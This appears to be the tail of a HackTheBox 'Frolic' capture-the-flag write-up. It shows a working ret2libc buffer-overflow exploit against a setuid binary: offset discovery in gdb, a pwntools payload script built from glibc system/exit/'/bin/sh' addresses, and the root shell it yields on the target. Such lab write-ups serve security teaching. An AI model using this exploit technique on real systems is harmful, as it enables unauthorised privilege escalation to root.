DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
Segmentation fault (core dumped)
The program simply repeat the input, but if the message is too large, the program crashes with coredump.
We transfer the program to our machine to anayze
www-data@frolic:/home/ayush/.binary$ scp rop u505@10.10.14.26:/home/u505/HTB/Machines/Frolic/ Could not create directory '/var/www/.ssh'. The authenticity of host '10.10.14.26 (10.10.14.26)' can't be established. ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4. Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). u505@10.10.14.26's password: rop 100% 7480 7.3KB/s 00:00
Binary analisis
u505@kali:~/HTB/Machines/Frolic$ checksec rop
[*] '/opt/HTB/Machines/Frolic/rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
www-data@frolic:/home/ayush/.binary$ cat /proc/sys/kernel/randomize_va_space
0
The direct execution on the stack is not allowed, but the ASLR (Address space layout randomization) is not enabled. So glic addresses are not variable.
The binary is very simple, first it setuid to root the program, and after it takes the argument and calls the vuln function.
In the vuln funcion, data are copied into a local variable with the function strcpy without any length control.
Buffer overflow offset
u505@kali:~/HTB/Machines/Frolic$ gdb rop GNU gdb (Debian 8.3.1-1) 8.3.1 Copyright (C) 2019 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>.
For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from rop... (No debugging symbols found in rop) (gdb) init-peda gdb-peda$ pattern create 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' Starting program: /opt/HTB/Machines/Frolic/rop 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x79 ('y') EBX: 0xffffd550 --> 0x2 ECX: 0x7fffffe5 EDX: 0xf7fad010 --> 0x0 ESI: 0xf7fab000 --> 0x1d6d6c EDI: 0xf7fab000 --> 0x1d6d6c EBP: 0x31414162 ('bAA1') ESP: 0xffffd520 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") EIP: 0x41474141 ('AAGA') EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x41474141 [------------------------------------stack-------------------------------------] 0000| 0xffffd520 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0004| 0xffffd524 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0008| 0xffffd528 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0012| 0xffffd52c ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0016| 0xffffd530 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL") 0020| 0xffffd534 ("AA4AAJAAfAA5AAKAAgAA6AAL") 0024| 0xffffd538 ("AJAAfAA5AAKAAgAA6AAL") 0028| 0xffffd53c ("fAA5AAKAAgAA6AAL") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41474141 in ?? () gdb-peda$ pattern offset 0x41474141 1095188801 found at offset: 52
The program crashes after 52 characters, and the value of the EIP register is taken from the stack.
EIP control
Our first script will put the value we want in the EIP register.
u505@kali:~/HTB/Machines/Frolic$ cat exploit.py #!/usr/bin/python from pwn import * junk = 'D'*52 eip=0xdeadc0de after = 'U'*8 payload = junk + p32(eip) + after
file = open("test","w") file.write (payload) file.close()
This first script will write 52 D and hexadecimal values of deadc0de into a file. If we pass this argument, the program should crash on the pointer 0xdeadc0de
u505@kali:~/HTB/Machines/Frolic$ python exploit.py
u505@kali:~/HTB/Machines/Frolic$ xxd test
00000000: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000010: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000020: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD
00000030: 4444 4444 dec0 adde 5555 5555 5555 5555 DDDD....UUUUUUUU
Execution
gdb-peda$ r `cat test` Starting program: /opt/HTB/Machines/Frolic/rop `cat test`
Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x40 ('@') EBX: 0xffffd560 --> 0x2 ECX: 0x0 EDX: 0xf7fad010 --> 0x0 ESI: 0xf7fab000 --> 0x1d6d6c EDI: 0xf7fab000 --> 0x1d6d6c EBP: 0x44444444 ('DDDD') ESP: 0xffffd530 ("UUUUUUUU") EIP: 0xdeadc0de EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0xdeadc0de [------------------------------------stack-------------------------------------] 0000| 0xffffd530 ("UUUUUUUU") 0004| 0xffffd534 ("UUUU") 0008| 0xffffd538 --> 0xffffd600 --> 0xffffd79c ("SHELL=/bin/bash") 0012| 0xffffd53c --> 0x8048561 (<__libc_csu_init+33>: lea eax,[ebx-0xf8]) 0016| 0xffffd540 --> 0xffffd560 --> 0x2 0020| 0xffffd544 --> 0x0 0024| 0xffffd548 --> 0x0 0028| 0xffffd54c --> 0xf7df2811 (<__libc_start_main+241>: add esp,0x10) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0xdeadc0de in ?? ()
Strategy
We cannot write executable code directly in the stack, but we can call functions from glibc. ASLR is not activated in the victim machine.
Our goal is to call
system("/bin/sh") and return to the function exit.
The payload should be:
junk (52 characters) + system addr + exit addr + string /bin/sh
First we try on our machine, we trun off the ASLR
u505@kali:~/HTB/Machines/Frolic$ sudo sysctl kernel.randomize_va_space=0
[sudo] password for u505:
kernel.randomize_va_space = 0
u505@kali:~/HTB/Machines/Frolic$ ldd rop
linux-gate.so.1 (0xf7fd3000)
libc.so.6 => /lib32/libc.so.6 (0xf7dd4000)
/lib/ld-linux.so.2 (0xf7fd4000)
We have the glic base address
u505@kali:~/HTB/Machines/Frolic$ readelf -s /lib32/libc.so.6 | grep system 257: 0012b320 102 FUNC GLOBAL DEFAULT 14 svcerr_systemerr@@GLIBC_2.0 658: 00042700 55 FUNC GLOBAL DEFAULT 14 __libc_system@@GLIBC_PRIVATE 1528: 00042700 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
We have the offset of the function system in glibc
u505@kali:~/HTB/Machines/Frolic$ readelf -s /lib32/libc.so.6 | grep " exit@@" 150: 00035790 33 FUNC GLOBAL DEFAULT 14 exit@@GLIBC_2.0
And finaly the offset of the string /bin/sh inside of glibc
u505@kali:~/HTB/Machines/Frolic$ strings -atx /lib32/libc.so.6 | grep "/bin/sh"
17ff68 /bin/sh
Test
u505@kali:~/HTB/Machines/Frolic$ python exploit.py [*] systemaddr 0xf7e16700 [*] exitaddr 0xf7e09790 [*] binshaddr 0xf7f53f68 u505@kali:~/HTB/Machines/Frolic$ xxd test 00000000: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000010: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000020: 4444 4444 4444 4444 4444 4444 4444 4444 DDDDDDDDDDDDDDDD 00000030: 4444 4444 0067 e1f7 9097 e0f7 683f f5f7 DDDD.g......h?.. u505@kali:~/HTB/Machines/Frolic$ sudo chown root:root rop u505@kali:~/HTB/Machines/Frolic$ sudo chmod 4755 rop u505@kali:~/HTB/Machines/Frolic$ ls -l rop -rwsr-xr-x 1 root root 7480 Feb 13 15:28 rop u505@kali:~/HTB/Machines/Frolic$ ./rop `cat test` -bash: warning: command substitution: ignored null byte in input Segmentation fault
It didn't work, :(, So I add a breakpoint just before the end of the function vuln to find the issue
gdb-peda$ pdisass vuln Dump of assembler code for function vuln: 0x080484f8 <+0>: push ebp 0x080484f9 <+1>: mov ebp,esp 0x080484fb <+3>: sub esp,0x38 0x080484fe <+6>: sub esp,0x8 0x08048501 <+9>: push DWORD PTR [ebp+0x8] 0x08048504 <+12>: lea eax,[ebp-0x30] 0x08048507 <+15>: push eax 0x08048508 <+16>: call 0x8048350 <strcpy@plt> 0x0804850d <+21>: add esp,0x10 0x08048510 <+24>: sub esp,0xc 0x08048513 <+27>: push 0x80485dd 0x08048518 <+32>: call 0x8048340 <printf@plt> 0x0804851d <+37>: add esp,0x10 0x08048520 <+40>: sub esp,0xc 0x08048523 <+43>: lea eax,[ebp-0x30] 0x08048526 <+46>: push eax 0x08048527 <+47>: call 0x8048340 <printf@plt> 0x0804852c <+52>: add esp,0x10 0x0804852f <+55>: nop 0x08048530 <+56>: leave 0x08048531 <+57>: ret End of assembler dump. gdb-peda$ br *0x08048530 Breakpoint 1 at 0x8048530 gdb-peda$ r `cat test` Starting program: /opt/HTB/Machines/Frolic/rop `cat test` /bin/bash: warning: command substitution: ignored null byte in input [----------------------------------registers-----------------------------------] EAX: 0x3f ('?') EBX: 0xffffd560 --> 0x2 ECX: 0x0 EDX: 0xf7fad010 --> 0x0 ESI: 0xf7fab000 --> 0x1d6d6c EDI: 0xf7fab000 --> 0x1d6d6c EBP: 0xffffd528 ("DDDDg\341\367\220\227\340\367h?\365", <incomplete sequence \367>) ESP: 0xffffd4f0 --> 0xffffd548 --> 0x0 EIP: 0x8048530 (<vuln+56>: leave) EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048527 <vuln+47>: call 0x8048340 <printf@plt> 0x804852c <vuln+52>: add esp,0x10 0x804852f <vuln+55>: nop => 0x8048530 <vuln+56>: leave 0x8048531 <vuln+57>: ret 0x8048532: xchg ax,ax 0x8048534: xchg ax,ax 0x8048536: xchg ax,ax [------------------------------------stack-------------------------------------] 0000| 0xffffd4f0 --> 0xffffd548 --> 0x0 0004| 0xffffd4f4 --> 0x0 0008| 0xffffd4f8 ('D' <repeats 52 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>) 0012| 0xffffd4fc ('D' <repeats 48 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>) 0016| 0xffffd500 ('D' <repeats 44 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>) 0020| 0xffffd504 ('D' <repeats 40 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>) 0024| 0xffffd508 ('D' <repeats 36 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>) 0028| 0xffffd50c ('D' <repeats 32 times>, "g\341\367\220\227\340\367h?\365", <incomplete sequence \367>) [------------------------------------------------------------------------------] Legend: code, data, rodata, value
Breakpoint 1, 0x08048530 in vuln ()
We see after the 52 Ds, we have a g.
gdb-peda$ next
...
gdb-peda$
[----------------------------------registers-----------------------------------]
EAX: 0x3f ('?')
EBX: 0xffffd560 --> 0x2
ECX: 0x0
EDX: 0xf7fad010 --> 0x0
ESI: 0xf7fab000 --> 0x1d6d6c
EDI: 0xf7fab000 --> 0x1d6d6c
EBP: 0x44444444 ('DDDD')
ESP: 0xffffd530 --> 0x68f7e097
EIP: 0x90f7e167
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x90f7e167
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0x68f7e097
0004| 0xffffd534 --> 0xf7f53f
0008| 0xffffd538 --> 0xffffd600 --> 0xffffd79c ("SHELL=/bin/bash")
0012| 0xffffd53c --> 0x8048561 (<__libc_csu_init+33>: lea eax,[ebx-0xf8])
0016| 0xffffd540 --> 0xffffd560 --> 0x2
0020| 0xffffd544 --> 0x0
0024| 0xffffd548 --> 0x0
0028| 0xffffd54c --> 0xf7df2811 (<__libc_start_main+241>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x90f7e167 in ?? ()
The address does not correspond to the system address, my system address has a null character, and bash ignores it.
00000030: 4444 4444 0067 e1f7 9097 e0f7 683f f5f7 DDDD.g......h?..
So the payload delivered is
00000030: 4444 4444 67e1 f790 97e0 f768 3ff5 f7 DDDDg......h?..
So my machine is not suitable for this test. Afterward it seems easy, but it took me a long time to realize this issue,...
Test in 32 bits machine
Disable ASLR
u505@ubuntu1604432bits:~$ sudo sysctl kernel.randomize_va_space=0 kernel.randomize_va_space = 0
Change perms of rop file
u505@ubuntu1604432bits:~$ sudo chown root:root rop u505@ubuntu1604432bits:~$ sudo chmod 4755 rop u505@ubuntu1604432bits:~$ ls -l rop -rwsr-xr-x 1 root root 7480 Feb 13 18:04 rop
Look for addreses
u505@ubuntu1604432bits:~$ ldd rop
linux-gate.so.1 => (0xb7fda000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e1a000)
/lib/ld-linux.so.2 (0xb7fdb000)
u505@ubuntu1604432bits:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
u505@ubuntu1604432bits:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
u505@ubuntu1604432bits:~$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "bin/sh"
15ba0b /bin/sh
We create the exploit file, and generate the file
u505@kali:~/HTB/Machines/Frolic$ python exploit.py [*] systemaddr 0xb7e54da0 [*] exitaddr 0xb7e489d0 [*] binshaddr 0xb7f75a0b u505@kali:~/HTB/Machines/Frolic$ cat test | base64 RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKBN5bfQieS3C1r3tw==
And we test it from our test machine
u505@ubuntu1604432bits:~$ ./rop `echo -n RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKBN5bfQieS3C1r3tw== | base64 -d`
# whoami
root
Escalation on the target machine
www-data@frolic:/home/ayush/.binary$ ldd rop
linux-gate.so.1 => (0xb7fda000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
/lib/ld-linux.so.2 (0xb7fdb000)
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0
627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE
1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
www-data@frolic:/home/ayush/.binary$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " exit@@"
141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
www-data@frolic:/home/ayush/.binary$ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "bin/sh"
15ba0b /bin/sh
We generate the payload file
u505@kali:~/HTB/Machines/Frolic$ cat exploit.py
#!/usr/bin/python
from pwn import *
junk = 'D'*52
glibcbase=0xb7e19000
systemoffset=0x0003ada0
exitoffset=0x0002e9d0
binshoffset=0x15ba0b
systemaddr=glibcbase+systemoffset
exitaddr=glibcbase+exitoffset
binshaddr=glibcbase+binshoffset
log.info("systemaddr 0x%x" % systemaddr)
log.info("exitaddr 0x%x" % exitaddr)
log.info("binshaddr 0x%x" % binshaddr)
payload = junk + p32(systemaddr) + p32(exitaddr) + p32(binshaddr)
file = open("test","w")
file.write (payload)
file.close()
u505@kali:~/HTB/Machines/Frolic$ python exploit.py
[*] systemaddr 0xb7e53da0
[*] exitaddr 0xb7e479d0
[*] binshaddr 0xb7f74a0b
u505@kali:~/HTB/Machines/Frolic$ cat test | base64
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKA95bfQeeS3C0r3tw==
And we execute the file with the payload
www-data@frolic:/home/ayush/.binary$ ./rop `echo -n "RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERKA95bfQeeS3C0r3tw==" | base64 -d`
# whoami
root
Root Flag
root@frolic:/tmp# cat /root/root.txt <ROOT_FLAG>
References
- Gaining RCE by abusing Node-RED
- noderedsh.py
- Linux Kernel - BPF Sign Extension Local Privilege Escalation
Daniel Simao 09:51, 12 February 2020 (EST)
